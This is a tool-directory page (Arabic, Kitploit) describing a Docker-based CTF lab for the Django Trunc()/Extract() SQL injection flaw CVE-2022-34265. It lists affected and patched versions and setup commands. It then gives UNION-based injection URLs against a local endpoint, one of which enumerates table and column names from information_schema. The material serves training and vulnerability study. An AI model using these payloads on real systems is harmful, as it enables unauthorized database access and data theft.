Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CTF_Django_CVE-2022-34265 — # تحدي CTF قائم على Docker يوضح حقن SQL في دوال Trunc() و Extract() الخاصة بـ Django (CVE-2022-34265) مع أمثلة على حمولات قائمة على UNION. | Kitploit
أدوات/GitHubGitHub/lnwza0x0a/ctf_django_cve-2022-34265
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبCTFالتعلم والتعليمأمن قواعد البياناتمختبرات وتدريب عملي
GitHublnwza0x0a/ctf_django_cve-2022-34265

CTF_Django_CVE-2022-34265

# تحدي CTF قائم على Docker يوضح حقن SQL في دوال Trunc() و Extract() الخاصة بـ Django (CVE-2022-34265) مع أمثلة على حمولات قائمة على UNION.

عرض المستودع
12منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CTF_CVE-2022-34265

الوصف

تم اكتشاف مشكلة في Django 3.2 قبل 3.2.14 و4.0 قبل 4.0.6. دوال قاعدة البيانات Trunc() وExtract() معرضة لحقن SQL إذا تم استخدام بيانات غير موثوقة كقيمة kind/lookup_name. التطبيقات التي تقيّد اختيار lookup_name وkind إلى قائمة آمنة معروفة غير متأثرة.

كيفية الاستخدام

البدء

root@kitploit:~
git clone https://github.com/coco0x0a/CTF_CVE-2022-34265
cd CVE-2022-34265
sudo docker-compose up -d

التحقق من الحالة

root@kitploit:~
sudo docker ps

الإزالة

root@kitploit:~
sudo docker-compose down

الإصدارات المتأثرة

  • Django>= 3.2, < 3.2.14

  • Django >= 4.0, < 4.0.6

الإصدارات المصححة

  • Django 3.2.14

  • Django 4.0.6

التحقق

البيئة

  • Django 4.0.5
  • Python 3.8.13
  • MySQL 5.7

حقن SQL

باستخدام UNION

root@kitploit:~
http://127.0.0.1:8000/extract/?lookup_name=year%20FROM%20start_datetime))%20OR%201=1%20UNION%20SELECT%201--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, 2, 3, 4, 5, 6, 7--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT "TEST", now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT CONCAT(table_name, '~', column_name), now(), now(), now(), now(), now(), now() FROM information_schema.columns--

image

المراجع

https://github.com/aeyesec/CVE-2022-34265

https://github.com/ZhaoQi99/CVE-2022-34265

https://github.com/suksit/writeups/tree/main/secplayground/half-year-event-2022

تنزيل الأداة